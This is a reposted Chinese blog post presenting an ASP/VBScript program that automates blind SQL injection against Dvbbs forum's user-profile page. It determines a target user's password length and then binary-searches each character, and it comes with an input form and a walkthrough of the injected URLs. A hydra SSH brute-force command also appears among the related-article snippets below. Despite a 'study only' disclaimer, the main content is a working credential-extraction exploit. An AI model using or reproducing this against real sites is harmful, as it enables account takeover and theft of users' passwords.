动网论坛密码暴力破解程序代码 (转)

最新推荐文章于 2023-05-26 18:07:12 发布
最新推荐文章于 2023-05-26 18:07:12 发布
阅读量195 收藏
点赞数
文章标签: 数据库
动网论坛密码暴力破解程序代码 (转)[@more@]

response.buffer=false
'为防止程序陷入死循环,初始化一些最大重试值
Dim MaxPaSSLen,MaxPasSASc
MaxPassLen=20 '密码最大长度
MaxPassAsc=20

'==== 字符转换
Function bytes2BSTR(vIn)
strReturn = ""
For j = 1 To LenB(vIn)
ThisCharCode = AscB(Midb(vIn,j,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,j+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
j = j + 1
End If
Next
bytes2BSTR = strReturn
End Function
' 下面是取网页内容 ==========
Function GetUrl(Url)
set oSend=createobject("microsoft.XMLHTTP")
sourceCode = oSend.open ("GET",url,false)
oSend.send()
SourceCode = bytes2BSTR(oSend.responseBody)
GetUrl = SourceCode
End Function
'下面是判断返回页面效果
Function ChkPage(SourceCode,SucKey,ErrKey)
if Instr(SourceCode,SucKey) > 0 then
 ChkPage=true '页面返回成功
 exit function
end if
if Instr(SourceCode,ErrKey) > 0 then
 ChkPage=false '页面出错
 exit function
end if
 ChkPage=false '关键字信息不对或者是页面未连接
 response.write("关键字信息不对或者是页面未连接")
 response.end
End Function

'开始破解
'Dim url,username,password,SucKey,

Dim PassLenUrl
Dim PassLen
Dim ChkPassLen

If request("begin")<>"" then
 response.Cookies("PassLen")=0
 url=request("url")
 username=request("username")
 password=request("password")
 SucKey=request("SucKey")
 ErrKey=request("ErrKey")
response.write("第一步,破解密码长度
")

PassLen = 1
ChkPassLen = false
Do while not ChkPassLen
 PassLenUrl = Url & username & "'%20and%20len(" & password & ")=" & PassLen & "%20and%20'1'='1"
 response.write("当前测试密码位数为“" & PassLen & "”,请稍等......
")
 ChkPassLen = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey)
 If ChkPassLen Then
 response.write("成功!!!密码位数已经测试出来了,开始测试具体位数
")
 exit do
 Else
 response.write("不行,继续下一位测试!
")
 End If
 If PassLen > MaxPassLen then
 response.write( "密码位数未能测试出,请确认是否有此用户或重新调整密码长度范围")
 response.end
 exit do
 End If
 PassLen = PassLen + 1
Loop
response.write ("已经测试出密码长度为" & PassLen & ",开始测试具体密码值

")
'循环每一位
Dim Asc1,Asc2,Asc10,Asc20,Ascstr
'Dim AscArr(PassLen)
Dim ChkPass,Asctemp1,Asctemp,count
Ascstr = ""

For i=1 to PassLen
ChkPass = false
Asc1 = 33
Asc2 = 126
response.write "开始破解第" & i & "位密码
"
'用二分法取asc码范围
 count=1
 suc=false
 Do while not suc
 Asctemp1=Asctemp
 if (Asc2-Asc1) mod 2 = 1 then
 Asctemp=(Asc2-Asc1-1)/2
 else
 Asctemp=(Asc2-Asc1)/2
 end if

 response.write "划定密码范围为:" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "
"
 PassLenUrl = Url & username & "'%20and%20asc(mid(password,"&i&",1))>=" & int(Asc1) & "%20and%20asc(mid(password,"&i&",1))<=" & int(Asc2) & "%20and%20'1'='1"
 response.write "划定密码范围为:" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "
"
 ChkPass = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey)
 if Asc1 = 33 and Asc2 = 126 and not ChkPass then
 response.write "密码不在所设定ASC码范围内"
 response.end
 exit do
 end if
 if ChkPass then
 Asc10=Asc1
 Asc20=Asc2
 response.write("密码在该范围内
")
 if Asc1=Asc2 then Suc = true
 Asc2 = Asc1 + Asctemp
 else
 Asc1 = Asc20-Asctemp1
 Asc2 = Asc20
 response.write("不在该范围内,改试另一范围
")
 end if
 count=count+1
 if count>MaxPassAsc then
 response.write("死循环了!")
 response.end
 exit do
 end if
 Loop
Ascstr=Ascstr & chr(Asc1)
 response.write"
当前破解进度(“"&Ascstr&"”)



"
Next


response.write"" & username & "的密码已经破解成功!!!!!!!(" & Ascstr & ")

"
else
%>


动网论坛暴力破解程序

RM METHOD=POST ACTION="" name=frm>
网站地址:ASP?username">http://*******/bbs/viewuser.asp?username=">(要破解攻击的地址,注:地址中"="后的信息不要)

密码字段:(在数据库中保存密码的字段名)

出错页关键字:(没有找到该用户时返回的页面关键字,比如“错误信息”)

成功页关键字:(成功查询到该用户资料时的关键字,比如用户名)

用户名称:(要破解密码的用户名)





首先申明该程序只是用来学习之用,请勿用在非法用途!!!!

该程序基于“星之海洋”的《ASP动网论坛漏洞分析》
例如要破一个名叫abc的用户密码,首先察看abc的用户资料,给出的连接是http://xxxxx/dispuser.asp?name=abc,在dispuser.asp中,读取参数的语句是: username=trim(request(“name”)),数据库的查询的语句是: sql=”select * from [user] where username=’”&username&”’”,看得出来, abc就是直接被作为了dispuer的一个参数username。另外,如果该用户不存在,程序就会给出提示,既然如此,我们就再写入个查询密码的条件,在where username=abc后面加上and userpassword=”******”,可以先用len函数试出用户的密码位数,地址就这么写http://xxxxx/dispuser.asp?name=abc'%20and%20len(userpassword)=5%20and%20'1'='1,这么看可能不好理解,放到sql语句里其实就是这副样子:sql=“select * from [User] where username='abc' and len(UserPassword)=5 and '1'='1'”,现在明白点了吧,%20是空格,abc后面的单引号和’1’=’1里的单引号都是为了和sql语句相匹配。奇怪,该用户不存在,喔?那就说明符合这个条件的用户没有,继续,把5换成6,7,8,依此类推,只要能显示出用户资料了,就说明密码位数猜对了。接下来要做的就是试每位的密码是多少了,继续要用到VBS,可以用left或right或mid函数,

ciya3282
关注
动网论坛密码暴力破解程序代码
中国多宝平台特色程序员的「钱途」
05-10 1397
response.buffer=false  '为防止程序陷入死循环,初始化一些最大重试值  Dim MaxPassLen,MaxPassAsc  MaxPassLen=20 '密码最大长度  MaxPassAsc=20 '==== 字符换  Function bytes2BSTR(vIn)  strReturn = ""  For j = 1 To LenB(vIn)  Th
密码破解程序密码破解程序密码破解程序
08-01
什么也不说什么也不说什么也不说什么也不说什么也不说
暴力破解密码的代码
12-24
暴力破解密码的程序,学习如何操作其他窗口,尤其是那些忘记密码的。
动网论坛password暴力破解程序代码
weixin_34208185的博客
07-31 150
&lt;%  response.buffer=false  '为防止程序陷入死循环,初始化一些最大重试值  Dim MaxPassLen,MaxPassAsc  MaxPassLen=20 'password最大长度  MaxPassAsc=20 '==== 字符换  Function bytes2BSTR(vIn)  strReturn = ""  For j =...
密码--暴力破解
热门推荐
M_Young的博客
12-10 1万+
1.海德拉(Hydra) hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决 于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。 root@kali2019:~# hydra -L userlist.txt -P passwordlist.txt -t 20 192.168.106.134 ssh 我们先建立简单的字典 ...
0110集成动网论坛shopxp购物商城源代码
07-02
【标题】"0110集成动网论坛shopxp购物商城源代码" 指的是一种结合了动网论坛和ShopXP购物商城系统的源代码整合方案。这种集成旨在为用户提供一个集社区交流与在线购物于一体的综合平台,允许用户在同一个网站上进行...
动网论坛程序Dvbbs8.2.0 ac
03-25
动网论坛程序Dvbbs是ASP编程语言开发的一款知名论坛软件,主要应用于构建基于Web的社区交流平台。8.2.0版本的发布标志着该软件在功能和安全性上进行了升级和优化,以满足用户日益增长的需求。这次更新可能包含了一些...
动网论坛8.2完整程序源代码(access)
12-04
动网论坛8.2完整程序源代码(access)》是一款基于Access数据库的网络社区软件,主要用于搭建在线讨论平台,促进用户之间的互动交流。动网论坛作为早期国内知名的论坛系统,其8.2版本在当时具有较高的流行度,提供...
动网论坛程序dvbbs8.1.0 ac
03-22
动网论坛程序DVBBS 8.1.0 AC:深入解析与应用》 动网论坛程序DVBBS是一款基于ASP技术构建的社区论坛软件,版本8.1.0 AC是其重要的更新版本。这款论坛系统以其稳定、高效、易用的特点,在国内互联网环境中得到了...
Python:暴力破解密码 - 压缩包、web实战
we chat:玩转测试开发
11-08 5409
常规情况下,由于web自身的服务资源,带宽,吞吐率的原因,存在访问上线的情况,这和极端情况下本地直接即时访问,即时反馈的机制是完全不可等同的。另外暴力破解密码这种行为本身就是一个徘徊为灰色地带的,并且条件极其苛刻的情况下才有可能使用得上,这也是为了极少存在通过暴力破解密码从而找回或者攻陷入口的原因。4、执行结果:即只需要27秒左右即可破解6位数字密码的zip密码包。1、创建一个web服务并创建密码,运行。1、创建一个zip包,并设置是需要密码。2、手动解压的时候,确认是需要密码的。
语言源代码密码暴力破解
08-17
语言源代码密码暴力破解
动力论坛社区 v1.1.rar
07-09
动力论坛已经在提供下载时经过了严格的测试,但是这是一个复杂的程序,我们并不能保证程序没有BUG和安全漏洞。所以动力不承担任何由本程序的BUG或者安全漏洞所造成的一切损失和后果。您在使用本程序的同时,已经默认同意以上声明。将下载回的 donglinet.rar 解压后放置在您的网站目录下。如果是初次安装请进入后台,建立或编辑用户组和其权限,并建立各论坛分类(一级论坛)和分论坛(一级以上论坛)。(注意:请将各分论坛设置成详细论坛)请先注册一个用户然后运行install.asp进行论坛安装
WinRaR破译脚本代码(vbs版爆经典)
10-13
WinRAR是大家常用的压缩工具,它的加密功能更是受到大家的青睐;这里做的是vbs脚本版的,很小巧实用。 技术含量: 1.分段破译 2.范围破译 3.数列应用 4.命令行运行WinRAR 还有许多这里不一一说明了,大家一下就明了了... 这里也先感谢大家的支持了...
C++学习day--13 循环的应用,暴力破解密码和输出动图
最新发布
我的博客
05-26 1272
C++学习day--12 循环的应用,暴力破解密码和输出动图
DISCUZ论坛管理员密码破解
花开的声音(Mr’yan的技术集)
05-13 1万+
DISCUZ论坛管理员密码忘记了怎么办?今天,一个朋友在QQ上问我,“如果DISCUZ论坛管理员密码忘记了 从MYSQL 哪里找啊?”, 他用的是HostMonster的虚拟主机。yun~~~, 自己也没用过DISCUZ,只好说,“这个不是很清楚,可以直接去改一下数据库的记录试一下,但是不知道DISCUZ是否对密码加密了 ”后来他登录cPanel,用phpM
暴力破解算法——寻找密码(递归方法)
da_xiang的博客
11-20 1万+
暴力破解算法——寻找密码(递归方法)本文采用暴力破解算法的基本思想: 假设密码有0,1,2三个数组组成,密码长度为2,那么,密码的组成形式如下图所示 算法步骤 算法会递归到最后一层 判断生成的字符串是否一致 如果一致,找到密码,返回1,否则返回0 “父函数”判断“子函数”返回的值,如果为0,则继续往下寻找;如为1,则返回1,以表示找到 对于算法的效率暂时没有去过多的去研究,如有改进的地方,欢迎指
python破解教程一 破解211高校BBS论坛的用户密码
rocky的专栏
05-01 3425
本文只是举一反三,用python演示一个思路,适用于不同的网站或者论坛。 请勿用于非法行为。以下代码亲测有效,破解了一些用户的弱密码。当然破解的成功率和你的字典有关,越复杂的字典,成功率就越高,但是花费的时间也就越长。# -*- coding: utf-8 -*- __author__ = 'rocky'# 破解211高校BBS论坛的用户密码 #来源:http://www.rcdisk.com
python-wifi
whiteso的博客
12-25 2921
# coding:utf-8 from tkinter import * from tkinter import ttk import pywifi from pywifi import const import time import tkinter.filedialog import tkinter.messagebox class MY_GUI(): def __init__(...
动网论坛7.1.0Sp1Sql商业版使用全攻略
"ASP动网论坛使用手册" ASP动网论坛是一款基于ASP技术的论坛软件,主要服务于ASP爱好者和开发者,提供社区交流平台。本手册详细介绍了如何安装和使用动网论坛7.1.0Sp1Sql商业版。下面将按照手册内容对关键知识点...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值